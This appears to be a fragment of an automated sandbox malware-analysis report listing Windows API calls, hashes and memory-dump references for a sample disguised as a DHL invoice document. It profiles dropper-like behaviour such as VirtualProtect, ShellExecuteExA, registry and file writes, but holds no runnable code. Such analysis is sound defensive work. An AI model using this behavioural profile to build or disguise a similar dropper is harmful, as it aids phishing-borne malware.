                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                            • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                            APIs
                                            • EnumWindows.USER32(00000000), ref: 6F7A2B87
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: EnumWindows
                                            • String ID:
                                            • API String ID: 1129996299-0
                                            • Opcode ID: 35667e24f67fd808904cb790709863f6b55d09353ebfffbf6d784bfe6406cb2b
                                            • Instruction ID: bec00bfda1faef61f3e725c466d7ee82d5676d9236d8eecd1c233542a5c43bba
                                            • Opcode Fuzzy Hash: 35667e24f67fd808904cb790709863f6b55d09353ebfffbf6d784bfe6406cb2b
                                            • Instruction Fuzzy Hash: 4241A172504704EFDB24DF7AEB84B4E3775EB45328F134A36D804CA150E73AA461DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: wsprintf
                                            • String ID:
                                            • API String ID: 2111968516-0
                                            • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                            • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                            • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                            • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                            APIs
                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                            • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                            • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                            • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                            • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                            • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                            • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                            APIs
                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                            • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                            • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                            • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                            APIs
                                            • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                            • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                            • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,?,00000000), ref: 00405EDB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                            • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                            • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                            • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,?,00000000,00000000,00000000), ref: 00405EAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                            • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                            • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                            • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                            APIs
                                            • VirtualProtect.KERNELBASE(6F7A504C,?,?,6F7A503C), ref: 6F7A29CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 4c429eb7927905584c8f303d136a6aaab3674671508231fa0554b94e9259805b
                                            • Instruction ID: 0c94d3369476fb0f800ff1bd0022247d4a1f166a790a44dbe0e05aa09be517e6
                                            • Opcode Fuzzy Hash: 4c429eb7927905584c8f303d136a6aaab3674671508231fa0554b94e9259805b
                                            • Instruction Fuzzy Hash: 3EF0A5B0504A80EECB64CF3CA64470F3BF0BB9A374B13857BE148D6242E33550749B91
                                            APIs
                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                            • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                            • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                            • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                            • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                            • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                            APIs
                                            • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                            • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                            • Opcode Fuzzy Hash: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                            • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                            APIs
                                            • SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 0040438B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                            • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                            • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                            • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                            APIs
                                            • SendMessageA.USER32(?,?,00000001,00404192), ref: 00404370
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                            • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                            • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                            • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                            APIs
                                            • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                            • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                            • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                            • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,?,0000000A,?), ref: 0040339E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
